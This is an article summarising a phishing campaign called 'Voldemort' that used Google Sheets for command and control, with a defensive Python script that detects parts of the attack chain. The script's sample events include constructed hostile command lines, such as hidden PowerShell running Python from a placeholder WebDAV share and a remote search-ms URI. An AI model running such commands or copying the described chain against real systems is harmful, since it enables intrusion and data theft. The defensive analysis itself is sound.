Proofpoint researchers have recently uncovered a sophisticated cyberattack campaign that has been leveraging Google Sheets as a command and control (C2) platform. Named “Voldemort” by these researchers, this campaign has been specifically targeting Windows users on a global scale, utilizing a combination of common and rare techniques to deliver custom malware.
The campaign in question began on August 5, 2024, and involved the sending of over 20,000 malicious messages to more than 70 organizations worldwide. These messages were cleverly disguised as communications from tax authorities in various countries such as the U.S., UK, France, Germany, Italy, India, and Japan. By impersonating these authorities and sending emails in their respective languages from compromised domains, the threat actors added a layer of authenticity to their phishing attempts.
The attack chain employed in this campaign is quite sophisticated, with the use of Google Sheets for C2 operations being a standout feature. The malware known as “Voldemort” is a custom backdoor coded in C, capable of gathering information and deploying additional payloads. The attackers employed a variety of techniques, including the abuse of Google Sheets, which is not commonly seen in the threat landscape.
The emails sent as part of the campaign contained links that redirected victims to a landing page hosted on InfinityFree. Upon clicking a “View Document” button on this page, the victim’s browser was checked for a Windows environment. If detected, the victim was redirected to a TryCloudflare-tunneled URI, which prompted the opening of Windows Explorer in a stealthy manner, masquerading the malware as a local PDF file to increase the chances of user interaction.
The lure abused the Windows search protocol (search-ms) to display remote files as if they were local. This technique, often used for deploying remote access trojans (RATs), has become popular among cybercriminals. Additionally, saved search file formats (.search-ms) were employed to further obscure the malicious activity.
If a victim executed the malicious LNK file, a PowerShell command was triggered to run Python.exe from a WebDAV share, executing a Python script without downloading files to the host. This script then collected system information and forwarded it to the threat actor’s infrastructure. Subsequently, the malware downloaded a decoy PDF and a password-protected ZIP file, extracting and executing a legitimate executable vulnerable to DLL hijacking.
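The search-ms lure and the PowerShell-launched Python interpreter on a WebDAV share are the parts of this chain that leave traces in endpoint process telemetry. The following is an added detection example, not Proofpoint's code or anything from the campaign: it runs three simple rules over constructed process-creation events (the host names are placeholders, and the field names are assumptions about the log format).

```python
import re

# Constructed sample process-creation events; not real telemetry from the campaign.
# Fields assumed: parent image name, image name, and the full command line.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -w hidden \\placeholder-host.invalid@SSL\DavWWWRoot\python.exe "
                r"\\placeholder-host.invalid@SSL\DavWWWRoot\run.py"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -File C:\Users\alice\Documents\backup.ps1"},
    {"parent": "chrome.exe", "image": "explorer.exe",
     "cmdline": r'explorer.exe "search-ms:query=invoice&crumb=location:\\placeholder-host.invalid@SSL\DavWWWRoot"'},
    {"parent": "cmd.exe", "image": "python.exe",
     "cmdline": r"C:\Python312\python.exe C:\dev\tool.py"},
]

# A UNC path: two backslashes, a host (WebDAV shares appear as host@SSL), then a share separator.
UNC_PATH = re.compile(r"\\\\[^\\\s\"']+\\")
# A search-ms URI whose crumb points at a remote location rather than a local folder.
SEARCH_MS_REMOTE = re.compile(r"search-ms:.*crumb=location:\\\\", re.IGNORECASE)


def classify(event):
    """Return the names of the detection rules that fire on one process-creation event."""
    hits = []
    cmd = event["cmdline"]
    image = event["image"].lower()
    parent = event["parent"].lower()
    # Rule 1: PowerShell running a Python interpreter straight from a network share.
    if image == "powershell.exe" and "python" in cmd.lower() and UNC_PATH.search(cmd):
        hits.append("powershell_runs_python_from_remote_share")
    # Rule 2: Explorer opened with a search-ms URI that browses a remote share.
    if SEARCH_MS_REMOTE.search(cmd):
        hits.append("search_ms_remote_location")
    # Rule 3: Explorer (i.e. a user double-click, such as an LNK) spawning hidden PowerShell.
    if parent == "explorer.exe" and image == "powershell.exe" and "-w hidden" in cmd.lower():
        hits.append("explorer_spawns_hidden_powershell")
    return hits


def scan(events):
    """Map event index -> fired rules, keeping only events with at least one hit."""
    results = {}
    for index, event in enumerate(events):
        hits = classify(event)
        if hits:
            results[index] = hits
    return results


if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS).items():
        print(index, SAMPLE_EVENTS[index]["image"], hits)
```

Legitimate administration can also launch interpreters from file shares, so the first rule is a lead to triage rather than a verdict on its own.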
One of the unique aspects of this campaign was the use of Google Sheets for C2 operations, data exfiltration, and command execution. By authenticating with Google Sheets using a client token, the malware was able to read and write data, effectively using the platform as a communication channel with the threat actors. Various commands, including file operations and system commands, were supported and executed via Google Sheets.
The implications of this campaign are significant, highlighting a combination of APT activity with cybercriminal characteristics. While Proofpoint assesses with moderate confidence that the campaign is likely orchestrated by an advanced persistent threat (APT) actor focused on intelligence gathering, the volume and targeting align more closely with cybercriminal activities. This unique blend of threats poses challenges to cybersecurity professionals, especially given the growing trend of abusing legitimate cloud services like Google Sheets for malicious purposes.
Overall, the Voldemort campaign represents a notable evolution in cyberattack strategies, combining sophisticated techniques with legitimate cloud-based services for malicious purposes. As threat actors continue to adapt and exploit new technologies, cybersecurity professionals must remain vigilant and proactive in developing defenses against such complex threats. The use of Google Sheets as a C2 platform underscores the need for heightened security measures and awareness of the potential misuse of legitimate cloud services.